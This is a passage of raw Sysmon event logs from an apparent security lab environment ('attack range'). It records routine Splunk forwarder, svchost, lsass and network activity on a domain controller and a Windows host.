23542300x8000000000000000296725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:43.902{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=483FB88649A0DBF6EE164B37C6B2D80C,SHA256=BB7E68BB5AD667FFC32A25908E344B2207FBBE6221B4267C20D57497A05D6F7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:43.464{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6360D2E6BFF52F2133C666B5DE8B2D63,SHA256=05FDFE742FB5A30F5850A5838BA90CA0D0A562885841790B73FCC8407A353605,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:41.623{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49374-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000296723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:43.770{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000296730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:44.917{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5102D8B6A061D03D58EC214856E8C0D8,SHA256=6CBAEBAB4DD76C5E35753233F2B6C1F225753F17DE148C115CD3B36B714DBEC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:42.539{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51599-false10.0.1.12-8000- 10341000x8000000000000000220667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16AC-6216-F404-000000003902}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16AC-6216-F404-000000003902}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.948{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16AC-6216-F404-000000003902}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.950{4F8D34B0-16AC-6216-F404-000000003902}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.480{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=887995B5B1AA6223B0354B03AF8FF057,SHA256=7E44737F9942E0FA4CDEAC67CCC6882FEE4D32EC8C3096CBCD9C9F602B8D9AE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:44.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B3AE2E638F25B8D17FD80818AE47A76,SHA256=77BB7A209656251697BA65402D41D79EC7D3F6466DF202A6744D810168FB7A31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:44.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F188FF768C4301151F1287694D6DCA5,SHA256=0D0CB410235E8FA838EAF5AA07C5D1097C51F6777BF358F262CD509EA024DD2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:43.244{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49375-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000296726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:43.244{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49375-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 10341000x8000000000000000220653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16AC-6216-F304-000000003902}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 